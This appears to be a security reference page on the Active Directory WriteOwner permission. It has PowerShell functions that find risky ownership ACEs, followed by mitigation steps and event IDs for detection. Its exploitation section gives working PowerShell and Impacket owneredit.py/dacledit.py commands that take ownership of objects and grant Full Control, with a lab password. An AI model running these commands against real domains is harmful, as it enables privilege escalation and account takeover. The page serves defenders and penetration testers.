WriteOwner
WriteOwner
Summary
FSProtect ACL Alias
WriteOwner
AD Alias
Modify Owner
Affected Object Types
Users, Groups, Computers, Domains
Exploitation Certainty
Certain
AD Right
WriteOwner
Description
The WriteOwner permission in Active Directory allows a user to change the ownership of an object, such as user accounts, groups, or computers. This permission is essential for administrative tasks, enabling proper delegation and management within the directory.
However, if misconfigured, the WriteOwner permission can pose significant security risks. An attacker with this permission can assign ownership of an object to themselves. nce ownership is taken, the attacker can modify the object's permissions to grant themselves additional rights, such as full control. This can lead to unauthorized access, privilege escalation, and persistent access within the system.
Identification
PowerShell
Active Directory Module
Using the ActiveDirectory PowerShell module, you can enumerate WriteOwner entries.
1. Find-WriteOwner Function
function Find-WriteOwner {
[CmdletBinding()]
param ([string]$SearchBase = $null,[string]$OutputPath = "WriteOwner.csv",[string]$Target = $null,[switch]$ExcludeAdmins)
Import-Module ActiveDirectory -ErrorAction Stop
Write-Host "Gathering Active Directory objects and inspecting ACLs for vulnerable WriteOwner permissions..."
$Allow = [System.Security.AccessControl.AccessControlType]::Allow
$Right = [System.DirectoryServices.ActiveDirectoryRights]::WriteOwner
$DomainNetBIOSName = $null
try { $DomainNetBIOSName = (Get-ADDomain).NetBIOSName } catch {}
$ExcludedSIDs = @()
if ($ExcludeAdmins) {
Write-Host "Excluding default/well-known privileged principals..."
$ExcludedSIDs += New-Object System.Security.Principal.SecurityIdentifier 'S-1-3-0'
$nameCandidates = @(
'NT AUTHORITY\SYSTEM','NT AUTHORITY\SELF','BUILTIN\Administrators','BUILTIN\Account Operators','BUILTIN\Server Operators','BUILTIN\Backup Operators','BUILTIN\Print Operators','NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS')
if ($DomainNetBIOSName) {$nameCandidates += @( "$DomainNetBIOSName\Domain Admins","$DomainNetBIOSName\Enterprise Admins","$DomainNetBIOSName\Schema Admins","$DomainNetBIOSName\Domain Controllers", "$DomainNetBIOSName\Key Admins","$DomainNetBIOSName\RAS and IAS Servers","$DomainNetBIOSName\DnsAdmins","$DomainNetBIOSName\Enterprise Key Admins")}
foreach ($n in $nameCandidates) {try {$sid = (New-Object System.Security.Principal.NTAccount $n).Translate([System.Security.Principal.SecurityIdentifier]); $ExcludedSIDs += $sid} catch {}}
Get-ADDomainController -Filter * | ForEach-Object { $ExcludedSIDs += (Get-ADComputer -Identity $_.Name -Properties SID).SID}
$ExcludedSIDs = $ExcludedSIDs | Select-Object -Unique
}
$objectsToScan = @()
try {
if ($Target) {
Write-Host "Targeting single object DN: $Target"
$obj = Get-ADObject -Identity $Target -ErrorAction Stop
if ($obj) { $objectsToScan = @($obj) }
} else {
$adObjectParams = @{
LDAPFilter = "(objectClass=*)"
ResultPageSize = 2000
ResultSetSize = $null
ErrorAction = "Stop"
}
if ($SearchBase) {$adObjectParams["SearchBase"] = $SearchBase;Write-Host "Searching for objects within '$SearchBase'."} else { Write-Host "Searching for all objects in the domain." }
$objectsToScan = Get-ADObject @adObjectParams
}
if (-not $objectsToScan -or $objectsToScan.Count -eq 0) {Write-Output "No objects found matching the criteria."; return }}catch { Write-Error "Failed to retrieve Active Directory objects: $($_.Exception.Message)"; return}
$results = New-Object System.Collections.Generic.List[object]
foreach ($obj in $objectsToScan) {
$dn = $obj.DistinguishedName
try {
$acl = Get-Acl -Path "AD:$dn" -ErrorAction Stop
foreach ($ace in $acl.Access) {
if ($ace.AccessControlType -ne $Allow) { continue };if (-not (($ace.ActiveDirectoryRights -band $Right) -eq $Right)) { continue }
if ($ace.IsInherited) { continue }
if ($ExcludeAdmins) {$aceSid = $null
try {$aceSid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier])} catch {}
if ($aceSid -and ($ExcludedSIDs -contains $aceSid)) {continue }
}
$results.Add([PSCustomObject]@{'Object Distinguished Name' = $dn
'Permission Holder' = $ace.IdentityReference.Value
'IsInherited' = $ace.IsInherited
'ACE Type' = $ace.AccessControlType
'Rights (bitmask)' = $ace.ActiveDirectoryRights
})}}catch {Write-Warning "Could not retrieve ACL for '$dn': $($_.Exception.Message)"}}
if ($results.Count -gt 0) {
Write-Host "Found $($results.Count) object(s) with vulnerable WriteOwner permissions$(if($ExcludeAdmins){' (excluding default entries)'})."
try {$results | Export-Csv -Path $OutputPath -NoTypeInformation -Encoding UTF8 -ErrorAction Stop ;Write-Output "Results exported successfully to '$OutputPath'"}
catch { Write-Error "Failed to export results to CSV file '$OutputPath': $($_.Exception.Message)" } } else { Write-Output "No Active Directory objects found with vulnerable WriteOwner permissions$(if($ExcludeAdmins){' (after exclusions)'})." }}2. Scan all domain objects
Find-WriteOwner3. Scan a specific object
Find-WriteOwner -Target "CN=Backup Operators,CN=Builtin,DC=Forestall,DC=labs"4. Exclude default admins for clear visibility
Find-WriteOwner -ExcludeAdmins -Target "CN=Backup Operators,CN=Builtin,DC=Forestall,DC=labs"5. Using SearchBase to limit the Scope
Find-WriteOwner -SearchBase "CN=Backup Operators,CN=Builtin,DC=Forestall,DC=labs".NET Directory Services
By leveraging PowerShell’s built-in .NET DirectoryServices namespace, you can enumerate WriteOwner entries without relying on any external modules or dependencies.
1. Find-WriteOwnerSimple Function
function Find-WriteOwnerSimple {
[CmdletBinding()]
param ([string]$SearchBase = $null,[string]$OutputPath = "WriteOwner.csv", [string]$Target = $null,[switch]$ExcludeAdmins)
$Allow = [System.Security.AccessControl.AccessControlType]::Allow
$Right = [System.DirectoryServices.ActiveDirectoryRights]::WriteOwner
try {$root = New-Object System.DirectoryServices.DirectoryEntry("LDAP://RootDSE");
$baseDN = $root.Properties["defaultNamingContext"].Value} catch {Write-Error "Failed to bind RootDSE: $_" ;return }
$ExcludedSIDs = @()
if ($ExcludeAdmins) {
$names = @('NT AUTHORITY\SYSTEM','NT AUTHORITY\SELF','BUILTIN\Administrators', 'BUILTIN\Account Operators','BUILTIN\Server Operators','BUILTIN\Backup Operators','BUILTIN\Print Operators','NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS')
$dom = $env:USERDOMAIN
if ($dom) {$names += @( "$dom\Domain Admins","$dom\Enterprise Admins","$dom\Schema Admins","$dom\Domain Controllers", "$dom\Key Admins","$dom\Enterprise Key Admins", "$dom\DnsAdmins","$dom\RAS and IAS Servers")}
foreach ($n in $names) {try {$ExcludedSIDs += ([System.Security.Principal.NTAccount]$n).Translate([System.Security.Principal.SecurityIdentifier])} catch {}}
try {
$dcOU = "LDAP://OU=Domain Controllers,$baseDN"
$dcRoot = New-Object System.DirectoryServices.DirectoryEntry($dcOU)
$ds = New-Object System.DirectoryServices.DirectorySearcher($dcRoot)
$ds.Filter = "(objectCategory=computer)"; $ds.PageSize = 1000
[void]$ds.PropertiesToLoad.Add("objectSid");$dcs = $ds.FindAll()
foreach ($dc in $dcs) {
try {$sidBytes = $dc.Properties["objectSid"][0];if ($sidBytes) { $ExcludedSIDs += New-Object System.Security.Principal.SecurityIdentifier($sidBytes,0) }} catch {}}} catch {}
try { $ExcludedSIDs += New-Object System.Security.Principal.SecurityIdentifier 'S-1-3-0' } catch {}
$ExcludedSIDs = $ExcludedSIDs | Select-Object -Unique
}
$entries = @()
if ($Target) { try {$entries = @( New-Object System.DirectoryServices.DirectoryEntry("LDAP://$Target") )} catch {Write-Error "Failed to bind to target '$Target': $_" ;return } } else {
$searchBaseDN = $SearchBase
if (-not $searchBaseDN) { $searchBaseDN = $baseDN }
try {
$searchRoot = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$searchBaseDN")
$ds = New-Object System.DirectoryServices.DirectorySearcher($searchRoot)
$ds.Filter = "(objectClass=*)";$ds.PageSize = 1000
[void]$ds.PropertiesToLoad.Add("distinguishedName");$hits = $ds.FindAll()
$entries = foreach ($h in $hits) {
try { $h.GetDirectoryEntry() } catch {}}} catch {Write-Error "LDAP enumeration failed: $_"; return}}
$results = New-Object System.Collections.Generic.List[object]
foreach ($entry in $entries) {
if (-not $entry) { continue };$dn = $null
try { $dn = $entry.Properties["distinguishedName"][0] } catch {};if (-not $dn) { continue }
try {$acl = $entry.ObjectSecurity ;$aces = $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])} catch { Write-Warning "Could not read ACL for $dn : $_"; continue }
foreach ($ace in $aces) {
if ($ace.AccessControlType -ne $Allow) { continue } ;if ( ($ace.ActiveDirectoryRights -band $Right) -ne $Right ) { continue }
if ($ace.IsInherited) { continue }
if ($ExcludeAdmins) { try {$aceSid = [System.Security.Principal.SecurityIdentifier]$ace.IdentityReference;if ($ExcludedSIDs -and ($ExcludedSIDs -contains $aceSid)) { continue }} catch {}}
$who = try {$ace.IdentityReference.Translate([System.Security.Principal.NTAccount]).Value} catch {$ace.IdentityReference.Value}
$results.Add([PSCustomObject]@{'Object Distinguished Name' = $dn; 'Permission Holder' = $who; 'IsInherited' = $ace.IsInherited; 'ACE Type' = $ace.AccessControlType; 'Rights (bitmask)' = $ace.ActiveDirectoryRights})}}
if ($results.Count -gt 0) { try { $results | Export-Csv -Path $OutputPath -NoTypeInformation -Encoding UTF8; Write-Host "Exported $($results.Count) entr$(if($results.Count -eq 1){'y'}else{'ies'}) to $OutputPath"} catch {Write-Error "Failed to export results: $_"}} else { Write-Host "No objects found with explicit non-inherited WriteOwner ACEs$(if($ExcludeAdmins){' after exclusions'})" }}2. Scan all domain objects
Find-WriteOwnerSimple3. Scan a specific object
Find-WriteOwnerSimple -Target "CN=Backup Operators,CN=Builtin,DC=Forestall,DC=labs"4. Exclude default admins for clear visibility
Find-WriteOwnerSimple -ExcludeAdmins -Target "CN=Backup Operators,CN=Builtin,DC=Forestall,DC=labs"5. Using SearchBase to limit the Scope
Find-WriteOwnerSimple -SearchBase "CN=Builtin,DC=Forestall,DC=labs"Active Directory Users and Computers
1. Open Active Directory Users and Computers on your Windows server.
2. Right-click on the Object name.
3. Select Properties from the context menu.
4. In the Properties window, navigate to the Security tab.
5. Click the Advanced button to open the Advanced Security Settings dialog.
6. In the Advanced Security Settings window, locate and select the relevant Access Control Entry (ACE) for the user or group you wish to configure.
7. Click Edit to modify the selected ACE.
8. In the permissions list, locate and select the Modify owner permission.
9. Click OK to save your changes and close the dialogs.
Exploitation
After granting our controlled attacker account Full Control over the object, further exploitation can be carried out. For detailed techniques and scenarios, please refer to GenericAll.
The following examples demonstrate exploitation on Windows and Linux environments.
Windows
To change the object's owner using AD Module
Import-Module ActiveDirectory
$objectDN = "<Vulnerable User>"
$acl = Get-Acl -Path "AD:$objectDN"
$newOwner = "<Attacker/Internal Threat>"
$acl.SetOwner([System.Security.Principal.NTAccount]$newOwner)
Set-Acl -Path "AD:$objectDN" -AclObject $aclExample:
Import-Module ActiveDirectory
$objectDN = "CN=Backup Operators,CN=Builtin,DC=Forestall,DC=labs"
$acl = Get-Acl -Path "AD:$objectDN"
$newOwner = "forestall\adam"
$acl.SetOwner([System.Security.Principal.NTAccount]$newOwner)
Set-Acl -Path "AD:$objectDN" -AclObject $acl
Now FullControl access can be granted to the controlled user
Import-Module ActiveDirectory
$objectDN = "<objectDn>"
$targetUser = New-Object System.Security.Principal.NTAccount("<domain>","<user>")
$acl = Get-Acl -Path "AD:$objectDN"
$fullControlRule = New-Object System.DirectoryServices.ActiveDirectoryAccessRule($targetUser,[System.DirectoryServices.ActiveDirectoryRights]::GenericAll,[System.Security.AccessControl.AccessControlType]::Allow)
$acl.AddAccessRule($fullControlRule)
Set-Acl -Path "AD:$objectDN" -AclObject $aclExample:
Import-Module ActiveDirectory
$objectDN = "CN=John,OU=Users,DC=forestall,DC=labs"
$targetUser = New-Object System.Security.Principal.NTAccount("FORESTALL","adam")
$acl = Get-Acl -Path "AD:$objectDN"
$fullControlRule = New-Object System.DirectoryServices.ActiveDirectoryAccessRule($targetUser,[System.DirectoryServices.ActiveDirectoryRights]::GenericAll, [System.Security.AccessControl.AccessControlType]::Allow)
$acl.AddAccessRule($fullControlRule)
Set-Acl -Path "AD:$objectDN" -AclObject $acl
Linux
To change the object's owner using owneredit.py
owneredit.py -new-owner <user> -target <targetobject> -action write <domain>/<user>:'<pass>' -dc-ip <dc-ip>Example:
owneredit.py -new-owner adam -target john -action write forestall.labs/adam:'Temp123!' -dc-ip 192.168.231.21
Now FullControl access can be granted to the controlled user
dacledit.py -rights FullControl -principal <user> -target <targetObject> -action write <domain>/<user>:'<pass>' -dc-ip <dcip>Example:
dacledit.py -rights FullControl -principal adam -target john -action write forestall.labs/adam:'Temp123!' -dc-ip 192.168.231.21
Mitigation
Access Control Entries identified as dangerous should be removed by following the steps below.
1. Open Active Directory Users and Computers, and enable the Advanced Features option.
2. Double click the affected object and open Security tab.
3. In this tab, click Advanced button and open the risky Access Control Entry.
4. Remove the Modify Owner right.
5. Click OK and Apply buttons for saving changes.
Detection
Ownership changes modify the ntSecurityDescriptor of an Active Directory object. Monitor for these events:
5136
A directory service object was modified.
AttributeLDAPDisplayName (expected value ntSecurityDescriptor), ObjectDN
4662
An operation was performed on an object.
ObjectType, ObjectName, AccessMask
References
Last updated
Was this helpful?